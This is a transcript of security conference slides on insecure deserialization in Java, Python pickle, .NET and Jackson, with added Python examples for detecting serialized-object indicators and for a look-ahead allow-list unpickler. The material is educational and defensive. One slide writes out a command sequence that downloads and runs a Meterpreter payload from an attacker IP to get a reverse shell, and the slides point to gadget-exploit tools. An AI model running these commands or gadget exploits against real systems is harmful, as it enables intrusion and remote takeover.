how to be an app serial killer...don't be scared!!! (or bored )-if you know nothing about this...

Post on 05-Feb-2020


TRANSCRIPT

How to be an App Serial Killer

Rebecca Deck

Avalara

@ranger_cha

DON'T BE SCARED!!! (or bored)

- If you know nothing about this topic… hopefully you understand 25%

- If you know a little about the topic… 50-75%

- If you are really solid in your knowledge of the topic… learn one or two new things


Objective

- Deserialization Background

- Normal Deserialization

- Finding Deserialization Issues

- Deserialization Exploitation


Deserialization Background

https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4

September 29, 2019

Serialization from the beginning…

What is an object?

Collection of values that works as a single unit


Serialization from the beginning…

Process of preparing objects for network transport

Also called marshalling

What does serialization look like?


Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html

Deserialization

Deserialization is the reverse of serialization

Usually from a readObject call (in Java)

Common in many languages

Force server to load an unexpected object

Often execute arbitrary code


Transferring Data with Serialization

- Server serializes → Client deserializes

- Client serializes → Server deserializes

- Server serializes → writes data to disk/Memcache → Server deserializes

Malicious Objects


Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/

Deserialization Remediation

How do you fix it?

Upgrade for…

Blacklisting???

Nooooo

Hard to write signatures

https://sayingimages.com/cat-meme/

Deserialization Remediation

Look-ahead Deserialization: overload resolveClass

Ensure that the object is of the correct class

JUST DON'T DO IT

Do something better like default JSON parsers

http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/

Finding Deserialization

September 28, 2019

White Box

Talk to developers

Look for deserialization calls

Java – readObject

Python – Pickle

.NET – TypeNameHandling, JavaScriptTypeResolver

Jackson – enableDefaultTyping, setSerializationInclusion, readValue


Black Box

Look for objects

Java – rO0, ACED0005, application/x-java-serialized-object

.NET – AAEAAAD/////, TypeObject, $type:

Python –

JSON – ["objtype",{"name": "value"}]
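Added example, not from the slides or any tool they reference: a Python scanner that applies the black-box indicators listed above (the Java ACED0005 stream magic and its base64 form rO0, the application/x-java-serialized-object content type, the .NET AAEAAAD///// prefix and $type key, and the Jackson-style ["objtype", {...}] array) to request bodies. The indicator labels, the function names and the sample requests are this example's own constructions, not real traffic.

```python
from __future__ import annotations

import re

# Byte patterns for the indicators on the black-box slide. The labels are this
# example's own, not names from the slides.
INDICATORS = {
    "java-raw": re.compile(rb"\xac\xed\x00\x05"),      # Java stream magic ACED0005
    "java-base64": re.compile(rb"rO0AB"),               # base64 of ACED0005 starts "rO0AB"
    "dotnet-base64": re.compile(rb"AAEAAAD/////"),      # base64 BinaryFormatter header
    "dotnet-type": re.compile(rb'"\$type"\s*:'),        # Json.NET TypeNameHandling key
    # Jackson default-typing array form: ["some.pkg.Class", {...}]
    "json-typed-array": re.compile(rb'\[\s*"[A-Za-z_][\w.$]*\.[\w$]+"\s*,\s*\{'),
}
JAVA_CONTENT_TYPE = "application/x-java-serialized-object"


def find_indicators(body: bytes, content_type: str = "") -> list[str]:
    """Return the sorted indicator labels present in one request."""
    hits = {name for name, pattern in INDICATORS.items() if pattern.search(body)}
    if JAVA_CONTENT_TYPE in content_type.lower():
        hits.add("java-content-type")
    return sorted(hits)


# Constructed sample traffic (not real captures): (request line, Content-Type, body).
SAMPLE_REQUESTS = [
    ("POST /api/session", JAVA_CONTENT_TYPE, b"\xac\xed\x00\x05sr\x00\x0bSessionBlob"),
    ("POST /login", "application/x-www-form-urlencoded",
     b"remember=rO0ABXNyAAtTZXNzaW9uQmxvYg==&next=%2F"),
    ("POST /profile", "application/json",
     b'{"$type":"Example.Type, ExampleAssembly","name":"x"}'),
    ("POST /import", "application/json", b'["com.example.Payload",{"name":"value"}]'),
    ("POST /search", "application/json", b'{"name":"value"}'),
]


def scan_requests(requests) -> dict[str, list[str]]:
    """Map each request line to its indicators; requests with none are omitted."""
    report = {}
    for request_line, content_type, body in requests:
        hits = find_indicators(body, content_type)
        if hits:
            report[request_line] = hits
    return report


if __name__ == "__main__":
    for request_line, hits in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{request_line}: {', '.join(hits)}")
```

The patterns are deliberately loose (a base64 prefix or a JSON key, not a full parse), so a hit is a prompt to look at the endpoint with a white-box review, not proof of a vulnerability; the clean /search request shows that ordinary JSON produces no hit.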


Exploiting Deserialization

September 28, 2019

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Look for deserialization calls


Pickle Deserialization Exploit Class

Create a class that executes code when created


Pickle Send Exploit

Send exploit to server

How depends on the app
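Added example, not from the slides or the linked pickle post: the Python counterpart of the look-ahead remediation described earlier (overriding resolveClass so the class is checked before it is instantiated) is an Unpickler whose find_class only resolves an allow-list. The block also shows, with a harmless module-level function standing in for a real gadget, why a check after pickle.loads comes too late: the callable runs during the load itself. UserPrefs, record, UnexpectedObject, LookAheadUnpickler and safe_loads are this example's own names, and the pickles are constructed in the block.

```python
from __future__ import annotations

import io
import pickle


class UserPrefs:
    """The one object type this hypothetical endpoint expects to receive."""

    def __init__(self, theme: str, page_size: int):
        self.theme = theme
        self.page_size = page_size


SIDE_EFFECTS = []  # records whether unpickling invoked a callable


def record(marker: str) -> str:
    SIDE_EFFECTS.append(marker)
    return marker


class UnexpectedObject:
    """Stand-in for the 'class that executes code when created' slide, using a
    harmless callable: unpickling it calls record(...) instead of building an
    instance. That callable-on-load behaviour is the mechanism being abused."""

    def __reduce__(self):
        return (record, ("callable ran during unpickle",))


# Look-ahead check: only the classes the application expects may be resolved.
ALLOWED = {(UserPrefs.__module__, UserPrefs.__qualname__)}


class LookAheadUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called before any object is constructed, so an unexpected class or
        # function is refused instead of instantiated (cf. resolveClass in Java).
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(data: bytes):
    return LookAheadUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    payload = pickle.dumps(UnexpectedObject())   # constructed unexpected pickle
    prefs = pickle.dumps(UserPrefs("dark", 50))   # constructed legitimate pickle

    SIDE_EFFECTS.clear()
    pickle.loads(payload)                 # plain loads: the callable runs immediately
    ran_unrestricted = len(SIDE_EFFECTS) == 1

    SIDE_EFFECTS.clear()
    try:
        safe_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True                    # refused before anything ran
    restored = safe_loads(prefs)          # allow-listed class still loads normally
    return {
        "unrestricted_ran_callable": ran_unrestricted,
        "blocked": blocked,
        "side_effects_when_blocked": len(SIDE_EFFECTS),
        "theme": restored.theme,
        "page_size": restored.page_size,
    }


if __name__ == "__main__":
    print(demo())
```

The allow-list is the whole design: anything not on it, including builtin functions, is refused by name before the stream can reference it, which is what the "ensure the object is of the correct class" slide asks for. Even so, the summary's advice stands: if the endpoint only needs a few fields, a plain JSON schema is simpler to get right than a hardened pickle loader.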


Deserialization in Java

Look for raw Java objects

Find a suitable gadget (object to run code when loaded)

Must be an object the app understands

Ysoserial provides several gadgets

https://github.com/frohoff/ysoserial


Deserialization in Java

Vulnerable app https://github.com/hvqzao/java-deserialize-webapp

Includes Apache Commons Collection

Ysoserial exploit only runs one command

Reverse shell in three commands:

wget IP/meterpreter
chmod +x meterpreter
./meterpreter


Deserialization in Java Example

No Java Objects?

Safe without Java objects?

Moar gadgets

https://github.com/mbechler/marshalsec

Same idea, different format: JSON, XML


Jackson Deserialization

Summary

• Ysoserial and marshalsec for exploit gadgets

• Find by looking for common serialized object magic numbers or deserialization routines in code

• Often “Fix” Deserialization by blacklisting classes (need patch)

• Better off rewriting the data serialization method

• Use safer (less full-featured) libraries


References

Look-ahead Java Deserialization

https://www.ibm.com/developerworks/java/library/se-lookahead/index.html


References

Deserialization Resources

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md

Marshalling Pickles

http://frohoff.github.io/appseccali-marshalling-pickles/

ysoserial

https://github.com/frohoff/ysoserial

Deserialization – Different marshallers

https://github.com/mbechler/marshalsec


References

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Java Deserialization app

https://github.com/hvqzao/java-deserialize-webapp

Jackson Deserialization

https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/


Questions?


www.directdefense.com